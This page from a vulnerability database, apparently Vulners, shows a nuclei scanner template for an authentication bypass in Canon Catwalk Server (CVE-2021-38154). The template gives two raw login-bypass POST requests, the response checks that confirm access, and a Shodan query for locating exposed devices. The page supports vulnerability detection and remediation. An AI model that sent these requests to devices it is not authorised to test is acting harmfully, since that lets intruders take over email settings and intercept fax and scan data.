Lucene search
K

Canon Devices - Authentication Bypass in Catwalk Server

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Canon devices with Catwalk enabled allow authentication bypass, enabling attackers to modify email.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-38154
29 Aug 202105:15
attackerkb
Circl
CVE-2021-38154
10 Oct 202510:51
circl
CNNVD
Canon 多款产品信息泄露漏洞
29 Aug 202100:00
cnnvd
CVE
CVE-2021-38154
29 Aug 202104:59
cve
Cvelist
CVE-2021-38154
29 Aug 202104:59
cvelist
EUVD
EUVD-2021-24625
7 Oct 202500:30
euvd
NVD
CVE-2021-38154
29 Aug 202105:15
nvd
Prion
Code injection
29 Aug 202105:15
prion
Positive Technologies
PT-2021-21971
29 Aug 202100:00
ptsecurity
RedhatCVE
CVE-2021-38154
22 May 202520:08
redhatcve
Rows per page
id: CVE-2021-38154

info:
  name: Canon Devices - Authentication Bypass in Catwalk Server
  author: daffainfo
  severity: high
  description: |
    Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
  impact: |
    Unauthenticated attackers can modify email settings and redirect FAX and scan data to attacker-controlled email addresses when PIN protection is disabled, potentially intercepting sensitive business communications.
  remediation: |
    Configure a PIN for General User Mode or apply Canon firmware updates that address this vulnerability.
  reference:
    - https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwalk_Alert
    - https://www.usa.canon.com/internet/portal/us/home/support/product-advisories
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38154
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-38154
    cwe-id: CWE-732
    epss-score: 0.04
    epss-percentile: 0.89292
    cpe: cpe:2.3:h:canon:-:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: canon
    shodan-query: title:"imageRUNNER"
  tags: cve,cve2021,canon,auth-bypass,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        POST /tryLogin.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginM=&0000=0011&0002=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 303'
          - 'contains(location, "/portal_top.html")'
          - 'contains(set_cookie, "fusion-http-session-id=")'
        condition: and

  - raw:
      - |
        POST /checkLogin.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        i0017=2&i0019=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "/portal_top.html")'
          - 'contains(set_cookie, "sessid=")'
        condition: and
# digest: 490a0046304402205077e4af33a38de8a5049b2990708728cbd6097ccd838c9a787453a79bce53700220608cf4612ec4f6a41ce18848bc71955d4765ad2d6b1c2aecc7de373e940ef158:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 24.3
CVSS 3.17.5
EPSS0.04
17